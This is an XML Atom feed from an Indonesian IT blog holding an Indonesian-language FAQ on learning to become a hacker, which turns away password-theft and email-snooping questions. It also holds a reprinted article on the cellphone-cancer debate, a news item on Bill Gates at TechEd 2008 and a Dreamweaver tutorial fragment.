<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5773664350252692454</id><updated>2012-01-25T17:25:00.533-08:00</updated><category term='Web Designer'/><category term='hacking'/><category term='Internet'/><category term='networking'/><category term='News'/><category term='Linux'/><category term='Cracking'/><category term='Naked Science'/><category term='Computer'/><title type='text'>JepunSCRIPT</title><subtitle type='html'>it zone</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>24</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7925119280650410082</id><published>2008-06-27T22:02:00.001-07:00</published><updated>2008-06-29T03:24:56.738-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Langkah Menjadi Seorang Hacker</title><content type='html'>&lt;p&gt;[F.A.Q]&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;T : Tolong Jelaskan Apa Itu HAcker ?&lt;br /&gt;J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam&lt;br /&gt;mengenai kerja suatu system, komputer, atau jaringan komputer."&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Maukah Anda mengajari saya cara hacking?&lt;br /&gt;J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.&lt;br /&gt;Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,&lt;br /&gt;mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang&lt;br /&gt;mereka ketahui&lt;br /&gt;&lt;br /&gt;Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda&lt;br /&gt;mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada&lt;br /&gt;hacker yang Anda jumpai.&lt;br /&gt;&lt;br /&gt;Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,&lt;br /&gt;ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang&lt;br /&gt;yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono&lt;br /&gt;dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah&lt;br /&gt;mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,&lt;br /&gt;atau Anda tidak akan diacuhkan.&lt;br /&gt;&lt;br /&gt;Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email&lt;br /&gt;lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan&lt;br /&gt;orang-orang ini biasanya pencuri yang memakai account curian, dan kami&lt;br /&gt;tidak berminat menghargai pencuri&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Kalau begitu arahkan saya?&lt;br /&gt;J : Baiklah , kamu harus belajar !!&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apa yang harus di pelajari ?&lt;br /&gt;J : Networking (jaringan) , Programing , Sistem Operasi , Internet&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : wow, apa gak terlalu banyak tuh ?&lt;br /&gt;J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting&lt;br /&gt;Ingat semua itu perlu proses!&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Networking saya mulai dari mana ?&lt;br /&gt;J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi&lt;br /&gt;jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran&lt;br /&gt;di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Untuk programing ?&lt;br /&gt;J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah&lt;br /&gt;pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart&lt;br /&gt;atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat&lt;br /&gt;disarankan belajar pemrograman yang masih menomer satukan logika/murni&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?&lt;br /&gt;J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar&lt;br /&gt;bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti&lt;br /&gt;menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )&lt;br /&gt;(*ini murni pengalaman pribadi)&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Bagaimana saya harus memulai programing ?&lt;br /&gt;J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh&lt;br /&gt;dari bahasa pemrograman yang akan anda pelajari , Cari dan install software&lt;br /&gt;yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram&lt;br /&gt;walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang&lt;br /&gt;program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya&lt;br /&gt;membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama&lt;br /&gt;dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )&lt;br /&gt;, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi&lt;br /&gt;sampai putus asa.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?&lt;br /&gt;J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari&lt;br /&gt;bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.&lt;br /&gt;Menerima situasi monopoli seperti itu bukanlah cara hacker.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah matematika saya harus bagus untuk menjadi hacker?&lt;br /&gt;J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran&lt;br /&gt;eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.&lt;br /&gt;&lt;br /&gt;Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para&lt;br /&gt;insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,&lt;br /&gt;teori himpunan hingga, kombinasi, dan teori graph) berguna.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Tentang pemrograman Web , apakah harus ?&lt;br /&gt;J : Yupe, dikarenakan Internet adalah dunia kamu nantinya&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?&lt;br /&gt;J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih&lt;br /&gt;familiar ke programing secara penuh&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Tentang Sistem Operasi , kenapa harus ?&lt;br /&gt;J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?&lt;br /&gt;karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating&lt;br /&gt;system , kenali dan akrabkan diri :)&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Sebaiknya, Operating system apa yang saya perdalami?&lt;br /&gt;J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas&lt;br /&gt;juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan&lt;br /&gt;masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar&lt;br /&gt;dikarenakan sifat "open source"&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Untuk pemula seperti saya , apa yang harus saya gunakan ?&lt;br /&gt;J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik&lt;br /&gt;sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula&lt;br /&gt;J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak&lt;br /&gt;diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga&lt;br /&gt;dengan mandrake tetapi aku lebih comfort dengan redhat.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?&lt;br /&gt;J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Dimana Saya bisa mendapatkan programn program tersebut&lt;br /&gt;J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu&lt;br /&gt;banyak situs penyedia jasa yang dapat membantu kamu&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah saya HArus memiliki komputer ?&lt;br /&gt;Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer&lt;br /&gt;meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri&lt;br /&gt;karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset&lt;br /&gt;dsb, jadi ada baiknya kamu memilikinya agar dapat langsung&lt;br /&gt;menyalurkan semua ide dan pemikiran kamu&lt;br /&gt;Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk&lt;br /&gt;bereksplorasi dan mencoba tanpa takut merusak dsb&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Hardware apa yang saya butuhkan ?&lt;br /&gt;Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum&lt;br /&gt;mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Internet , apakah saya harus terkoneksi ke internet?&lt;br /&gt;Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung&lt;br /&gt;ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan&lt;br /&gt;penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Berapa lama waktu yang saya butuhkan?&lt;br /&gt;J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.&lt;br /&gt;Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan&lt;br /&gt;atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu&lt;br /&gt;selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar&lt;br /&gt;dan menyempurnakan keahlian.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?&lt;br /&gt;J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools&lt;br /&gt;semua orang juga bisa!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Bagaimana cara mendapatkan password account orang lain?&lt;br /&gt;J : Ini cracking. Pergi sana, bodoh.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Bagaimana cara menembus/membaca/memonitor email orang lain?&lt;br /&gt;J : Ini cracking. Jauh-jauh sana, goblok&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Cracker ? apa itu ?&lt;br /&gt;J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer&lt;br /&gt;tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai&lt;br /&gt;kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu&lt;br /&gt;sistem&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?&lt;br /&gt;J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata&lt;br /&gt;penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara&lt;br /&gt;efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur&lt;br /&gt;Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows&lt;br /&gt;seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya&lt;br /&gt;cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain&lt;br /&gt;yang setidaknya dirancang untuk keamanan.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah saya perlu komunitas ?&lt;br /&gt;J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung&lt;br /&gt;di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang&lt;br /&gt;spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;T : Apakah termasuk milis sekuriti ?&lt;br /&gt;J : iyah ! cobalah &lt;a href="mailto:bugtraq@securityfocus.com"&gt;bugtraq@securityfocus.com&lt;/a&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;ReFerensi : &lt;/p&gt;&lt;ol&gt;&lt;li&gt;RFC1392,Internet User Glossary How to Become A Hacker - Eric S Raymond Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto &lt;/li&gt;&lt;li&gt;Ezine at &lt;a href="http://ezine.echo.or.id/"&gt;http://ezine.echo.or.id&lt;/a&gt; &lt;/li&gt;&lt;li&gt;Milis &lt;a href="mailto:Newbie_hacker@yahoogroups.com"&gt;Newbie_hacker@yahoogroups.com&lt;/a&gt; &lt;/li&gt;&lt;li&gt;#e-c-h-o room @t DALNET&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7925119280650410082?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7925119280650410082/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7925119280650410082&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7925119280650410082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7925119280650410082'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/06/langkah-menjadi-seorang-hacker.html' title='Langkah Menjadi Seorang Hacker'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-2838366441816378966</id><published>2008-06-04T11:53:00.000-07:00</published><updated>2008-06-24T23:22:18.739-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Naked Science'/><title type='text'>Experts Revive Debate Over Cellphones and Cancer</title><content type='html'>&lt;img style="WIDTH: 133px; HEIGHT: 194px" height="416" alt="" src="http://graphics8.nytimes.com/images/2008/06/02/health/03well-190.jpg" width="190" align="left" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Last week, three prominent neurosurgeons told the CNN interviewer &lt;a title="More articles about Larry King." href="http://topics.nytimes.com/top/reference/timestopics/people/k/larry_king/index.html?inline=nyt-per"&gt;Larry King&lt;/a&gt; that they did not hold cellphones next to their ears. “I think the safe practice,” said Dr. Keith Black, a surgeon at Cedars-Sinai Medical Center in Los Angeles, “is to use an earpiece so you keep the microwave antenna away from your brain.”&lt;/p&gt;&lt;p&gt;Dr. Vini Khurana, an associate professor of &lt;a title="In-depth reference and news articles about Brain surgery." href="http://health.nytimes.com/health/guides/surgery/brain-surgery/overview.html?inline=nyt-classifier"&gt;neurosurgery&lt;/a&gt; at the Australian National University who is an outspoken critic of cellphones, said: “I use it on the speaker-phone mode. I do not hold it to my ear.” And CNN’s chief medical correspondent, Dr. Sanjay Gupta, a neurosurgeon at &lt;a title="More articles about Emory University" href="http://topics.nytimes.com/top/reference/timestopics/organizations/e/emory_university/index.html?inline=nyt-org"&gt;Emory University&lt;/a&gt; Hospital, said that like Dr. Black he used an earpiece. &lt;/p&gt;Last week, three prominent neurosurgeons told the CNN interviewer Larry King that they did not hold cellphones next to their ears. “I think the safe practice,” said Dr. Keith Black, a surgeon at Cedars-Sinai Medical Center in Los Angeles, “is to use an earpiece so you keep the microwave antenna away from your brain.”&lt;br /&gt;&lt;br /&gt;Dr. Vini Khurana, an associate professor of neurosurgery at the Australian National University who is an outspoken critic of cellphones, said: “I use it on the speaker-phone mode. I do not hold it to my ear.” And CNN’s chief medical correspondent, Dr. Sanjay Gupta, a neurosurgeon at Emory University Hospital, said that like Dr. Black he used an earpiece.&lt;br /&gt;&lt;br /&gt;Along with Senator Edward M. Kennedy’s recent diagnosis of a glioma, a type of tumor that critics have long associated with cellphone use, the doctors’&lt;br /&gt;remarks have helped reignite a long-simmering debate about cellphones and cancer.&lt;br /&gt;&lt;br /&gt;That supposed link has been largely dismissed by many experts, including&lt;br /&gt;the American Cancer Society. The theory that cellphones causebrain tumors “defies credulity,” said Dr. Eugene Flamm, chairman of neurosurgery at Montefiore Medical Center.&lt;br /&gt;&lt;br /&gt;According to the Food and Drug Administration, three large epidemiology studies since 2000 have shown no harmful effects. CTIA — the Wireless Association, the leading industry trade group, said in a statement, “The overwhelming majority of studies that have been published in scientific journals around the globe show that wireless phones do not pose a health risk.”&lt;br /&gt;&lt;br /&gt;The F.D.A. notes, however, that the average period of phone use in the studies it cites was about three years, so the research doesn’t answer questions about long-term exposures. Critics say many studies are flawed for that reason, and also because they do not distinguish between casual and heavy use.&lt;br /&gt;&lt;br /&gt;Cellphones emit non-ionizing radiation, waves of energy that are too weak to break chemical bonds or to set off the DNA damage known to cause cancer. There is no known biological mechanism to explain how non-ionizing radiation might lead to cancer.&lt;br /&gt;&lt;br /&gt;But researchers who have raised concerns say that just because science can’t explain the mechanism doesn’t mean one doesn’t exist. Concerns have focused on the heat generated by cellphones and the fact that the radio frequencies are absorbed mostly by the head and neck. In recent studies that suggest a risk, the tumors tend to occur on the same side of the head where the patient typically holds the phone.&lt;br /&gt;&lt;br /&gt;Like most research on the subject, the studies are observational, showing only an association between cellphone use and cancer, not a causal relationship. The most important of these studies is called Interphone, a vast research effort in 13 countries, including Canada, Israel and several&lt;br /&gt;in Europe.&lt;br /&gt;&lt;br /&gt;Some of the research suggests a link between cellphone use and three types of tumors: glioma; cancer of the parotid, a salivary gland near the ear; and acoustic neuroma, a tumor that essentially occurs where the ear meets the brain. All these cancers are rare, so even if cellphone use does increase risk, the risk is still very low.&lt;br /&gt;&lt;br /&gt;Last year, The American Journal of Epidemiology published data from Israel finding a 58 percent higher risk of parotid gland tumors among heavy cellphone users. Also last year, a Swedish analysis of 16 studies in the journal Occupational and Environmental Medicine showed a doubling of risk for acoustic neuroma and glioma after 10 years of heavy cellphone use.&lt;br /&gt;&lt;br /&gt;“What we’re seeing is suggestions in epidemiological studies that have looked at people using phones for 10 or more years,” says Louis Slesin, editor of Microwave News, an industry publication that tracks the research. “There are some very disconcerting findings that suggest a problem, although it’s much too early to reach a conclusive view.”&lt;br /&gt;&lt;br /&gt;Some doctors say the real concern is not older cellphone users, who began using phones as adults, but children who are beginning to use phones today and face a lifetime of exposure.&lt;br /&gt;&lt;br /&gt;“More and more kids are using cellphones,” said Dr. Paul J. Rosch, clinical professor of medicine and psychiatry at New York Medical College. “They may be much more affected. Their brains are growing rapidly, and their skulls are thinner.”&lt;br /&gt;&lt;br /&gt;For people who are concerned about any possible risk, a simple solution is to use a headset. Of course, that option isn’t always convenient, and some critics have raised worries about wireless devices like the Bluetooth that essentially place a transmitter in the ear.&lt;br /&gt;&lt;br /&gt;The fear is that even if the individual risk of using a cellphone is low, with three billion users worldwide, even a minuscule risk would translate into a major public health concern.&lt;br /&gt;&lt;br /&gt;“We cannot say with any certainty that cellphones are either safe or not safe,” Dr. Black said on CNN. “My concern is that with the widespread use of cellphones, the worst scenario would be that we get the definitive study 10 years from now, and we find out there is a correlation.”&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-2838366441816378966?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/2838366441816378966/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=2838366441816378966&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/2838366441816378966'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/2838366441816378966'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/06/experts-revive-debate-over-cellphones.html' title='Experts Revive Debate Over Cellphones and Cancer'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-5484823091842136464</id><published>2008-06-04T11:48:00.000-07:00</published><updated>2008-06-29T03:26:19.397-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Gates Bids Adieu to Developers</title><content type='html'>Gates started as a developer 33 years ago when he co-founded Microsoft, and the developers of the Windows OS are a primary reason the company is an industry powerhouse.&lt;br /&gt;&lt;br /&gt;The latter is not lost on Gates, who kicked off the TechEd Developers conference Tuesday morning, addressing what is perhaps his company's most loyal audience. He acknowledged their importance to his company. "The success of Microsoft really is due to our relationship with developers," he said.&lt;br /&gt;&lt;br /&gt;Gates spoke only briefly about his July 1 transition to spending most of his time at The Bill and Melinda Gates Foundation, calling it "a bit abrupt."&lt;br /&gt;&lt;br /&gt;"It will put me in new territory," he said. "That's the first time I've really changed my career since I was 17 years old. I've been completely immersed in software."&lt;br /&gt;&lt;br /&gt;Aside from that mention of his upcoming career change, the speech was textbook Gates, who for more than 30 years has been the face of Microsoft and the one responsible for laying out its future vision. On Tuesday he did more of the same, outlining future directions for application development and services, the latter being a more recent topic of interest for his company.&lt;br /&gt;&lt;br /&gt;On the former, Gates unveiled Microsoft's future direction application modeling, part of Project Oslo, Microsoft's application-development plan for making it easier for developers to build SOAs (service-oriented architectures). SOAs allow the underlying software running a company's network to communicate with software and pieces of software outside the firewall using standard network and application interfaces to create composite applications.&lt;br /&gt;&lt;br /&gt;Microsoft will give developers their first look at Oslo, which will add a common architecture for visually modeling applications in different Microsoft software products, in October at the Professional Developers Conference, Gates said.&lt;br /&gt;&lt;br /&gt;"We're taking the kind of models you're seeing rising in specific domains like software management in System Center, data design in SQL Server ... and [putting] them into one model-driven space," he said. "In some ways, it speaks to the dreams about a [central application] repository people have had for decades."&lt;br /&gt;&lt;br /&gt;As for services, Gates articulated perhaps more clearly than ever before Microsoft's plans to compete with companies like Google and Amazon.com to provide the industry's largest data centers for hosted services. Microsoft has been late to embrace a hosted-services business model, but has been forced by competition to move more quickly or miss out altogether on new Web-based business models.&lt;br /&gt;&lt;br /&gt;"We're taking everything we do at the server level and saying we will have a service that mirrors that exactly," Gates said. "It's getting us to think about data centers at a scale that we haven't thought of before... [to create] a mega-data center that Microsoft and only a few others will have."&lt;br /&gt;&lt;br /&gt;Gates also highlighted Microsoft's flagship Web technology, the Internet Explorer (IE) browser, which has been an asset and a curse for the company over the years. While it allowed Microsoft to secure its dominant position in Web-browsing technology, it also triggered Microsoft's U.S. antitrust woes, something that haunts the company to this day. IE also has taken a hit in the past several years as Mozilla Firefox, an open-source browser, has gained a loyal following, forcing Microsoft to step up development and make its own product more innovative.&lt;br /&gt;&lt;br /&gt;Gates revealed that beta 2 of the next version of IE, IE 8, will be available in August. He also stumped for what has been his pet interest during his years at Microsoft natural human-interface technology that allows people to interact with computers in ways similar to how they interact with each other. Last week, Microsoft revealed that the next version of Windows, Windows 7, will include touchscreen technology, a fact he mentioned in his talked.&lt;br /&gt;&lt;br /&gt;He also reiterated his vision for mini, tablet PCs that allow people to "write" and use other nature interfaces such as speech-recognition technology. Another futuristic technology Gates has promoted at Microsoft is robotics, and he made this interest part of the final discussion of his comments Tuesday. He welcomed onto the stage a Ph.D. candidate from the Massachusetts Institute of Technology (MIT) and the "Ballmer-bot," a robot made to imitate and act like Steve Ballmer, Microsoft's CEO and Gates' long-time business partner, who is not attending TechEd.&lt;br /&gt;&lt;br /&gt;"Developers, developers, developers, developers," the robot, developed using Microsoft Robotics Developer Studio product, repeated over and over, in an homage to Ballmer's famous rant. The robot also raised his arm, showing how he has the ability to "throw eggs," according to the MIT student controlling his movements.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-5484823091842136464?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/5484823091842136464/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=5484823091842136464&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/5484823091842136464'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/5484823091842136464'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/06/gates-bids-adieu-to-developers.html' title='Gates Bids Adieu to Developers'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4749057962166949283</id><published>2008-06-04T11:44:00.000-07:00</published><updated>2008-06-29T03:57:41.333-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web Designer'/><title type='text'>tutorial dreamweaver</title><content type='html'>Dreamweaver operates based upon the concept of a web site. When you first open the program, Dreamweaver makes you define a site. This helps you keep all files organized. With a simple web site, you will just need to keep a few files within a file folder. However, it is best to plan this out before you start, since folder maintenance will help greatly as your site grows and you start linking to other web pages and adding graphics.&lt;br /&gt;&lt;br /&gt;We do have some folder conventions for faculty. If you are updating an existing site, you will want to use the current folder structure. If you are working with others on a site (such as a department, special project, or student club) you will need to work closely so that you can coordinate your files, file structure and layout.&lt;br /&gt;&lt;br /&gt;The instructions below assume you are using ACC's tutorial files inside a folder called My Documents.&lt;br /&gt;&lt;br /&gt;Open the Site Files window. You can open this window by choosing Site &gt; Site Files.&lt;br /&gt;&lt;br /&gt;In the window that opens, choose Define Sites as shown below.&lt;br /&gt;&lt;br&gt;&lt;b&gt;to view all &lt;/b&gt;&lt;a href="http://www.haverford.edu/acc/docs/software/dreamweaver/welcome.htm"&gt;click here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4749057962166949283?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4749057962166949283/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4749057962166949283&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4749057962166949283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4749057962166949283'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/06/tutorial-dreamweaver.html' title='tutorial dreamweaver'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image 